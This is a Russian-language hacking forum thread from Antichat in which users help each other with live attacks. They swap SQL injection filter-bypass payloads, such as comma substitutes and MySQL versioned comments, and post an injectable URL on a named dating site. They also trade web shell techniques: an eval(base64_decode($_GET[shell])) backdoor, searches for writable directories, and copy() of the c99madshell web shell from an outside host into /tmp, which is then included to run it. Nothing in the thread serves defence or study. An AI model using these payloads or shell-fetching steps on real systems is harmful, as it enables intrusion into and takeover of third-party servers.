Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
22.05.2010, 12:30
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
Ребята, помогите, очень нужна помощь. Как в SQL-injection можно заменить запятую (именно запятую, не кавычку)? Вижу вариант только с char(44), но не знаю как правильно запрос составить. Вот пример: index.php?id=-999+union+select+1+char(44)+2+char(44)+3+--+ или как-то через скобки? Уже столько вариантов перепробовал, и не знаю что делать.
попробуй:
index.php?id=-999+union+select+1%2С2%2С3--
|
|
|
22.05.2010, 12:41
|
|
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
Провел на форуме:
435863
Репутация:
80
|
|
Через %2С не прокатило  |
|
|
|
22.05.2010, 12:46
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Сообщение от DrakonHaSh
CTAPu4OK
поиск доступных файлов/папок для записи:
find /home/data/www -perm -2 -ls
доступ к /tmp/bla.php есть практически всегда
если у тебя есть возможность выполнять php код на сервере то с кавычками можно бороться так:
<?eval(base64_decode($_GET[shell]));?>
Ты потом этот скрипт от туда никак не воспроизведешь!!
|
|
|
|
22.05.2010, 12:47
|
|
Участник форума
Регистрация: 06.06.2008
Сообщений: 171
Провел на форуме:
1085601
Репутация:
110
|
|
Сообщение от Sams
Ребята, помогите, очень нужна помощь.
Как в SQL-injection можно заменить запятую (именно запятую, не кавычку)? Вижу вариант только с char(44), но не знаю как правильно запрос составить. Вот пример:
index.php?id=-999+union+select+1+char(44)+2+char(44)+3+--+
или как-то через скобки?
Уже столько вариантов перепробовал, и не знаю что делать.
0x2c
upd, ступил, думал тебе в переменную надо)
Последний раз редактировалось crystalbit; 22.05.2010 в 12:50..
|
|
|
|
22.05.2010, 12:48
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
тогда так:
index.php?id=-999+union+select+1/*!,*/2/*!,*/3--
можно и так
если версия mysql 5
index.php?id=-999+union+select+1/*!12345,*/2/*!12345,*/3--
4 версия
index.php?id=-999+union+select+1/*!1234,*/2/*!1234,*/3--
etc...
Последний раз редактировалось pinch; 22.05.2010 в 12:51..
|
|
|
|
22.05.2010, 12:57
|
|
Новичок
Регистрация: 28.10.2008
Сообщений: 14
Провел на форуме:
92208
Репутация:
6
|
|
Сообщение от DrakonHaSh
CTAPu4OK
поиск доступных файлов/папок для записи:
find /home/data/www -perm -2 -ls
доступ к /tmp/bla.php есть практически всегда
если у тебя есть возможность выполнять php код на сервере то с кавычками можно бороться так:
<?eval(base64_decode($_GET[shell]));?>
Папки все доступны для записи, но права ограничены что даже скопировать не могу =(
php коды могу выполнять, но тоже ограниченные и после каждого кода идет exit; т.е. использовать код можно только один раз и в дальнейшем его нельзя использовать)
т.е. Сам експлойт на одном сервере, txt файл с исполняющимися коммандами на другом сервере, а пхп май админ на другом)
Последний раз редактировалось CTAPu4OK; 22.05.2010 в 12:59..
|
|
|
|
22.05.2010, 12:57
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
Сообщение от GOGA075
Ты потом этот скрипт от туда никак не воспроизведешь!!
ты ищи возможности, а не недостатки - и тогда успех станет случаться намного чаще чем облом 
CTAPu4OK
попробуй так
команда 1.
copy("http://madnet.name/files/download/9_c99madshell.php","/tmp/qwe.php");
команда 2.
include("/tmp/qwe.php");
Последний раз редактировалось DrakonHaSh; 22.05.2010 в 13:02..
|
|
|
|
22.05.2010, 13:07
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Сообщение от DrakonHaSh
ты ищи возможности, а не недостатки - и тогда успех станет случаться намного чаще чем облом
CTAPu4OK
попробуй так
команда 1.
copy("http://madnet.name/files/download/9_c99madshell.php","/tmp/qwe.php");
команда 2.
include("/tmp/qwe.php"); У меня то как раз все нормально!!!
и команда copy("http://madnet.name/files/download/9_c99madshell.php","/tmp/qwe.php");
тибе ничего не даст, ибо шелл должен быть в .txt формате, а то он будет воспроизводится на том сервере и перенаправлен на этот!
|
|
|
|
22.05.2010, 13:09
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
что-то нехватает фантазии раскрутить:
http://www.datehunters.com/Personals/member_page.asp?AdsID=17125+and+1=1&SexID=4
|
|
|
|
22.05.2010, 13:11
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
Сообщение от GOGA075
У меня то как раз все нормально!!!
и команда copy("http://madnet.name/files/download/9_c99madshell.php","/tmp/qwe.php");
тибе ничего не даст, ибо шелл должен быть в .txt формате, а то он будет воспроизводится на том сервере и перенаправлен на этот!
: )))) да я смотрю ты реальный знаток : ))))
а еще я умею gif тоже исполнять и умею php делать текстом : ))))
зайти по ссылке дабы больше не лохаться так
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
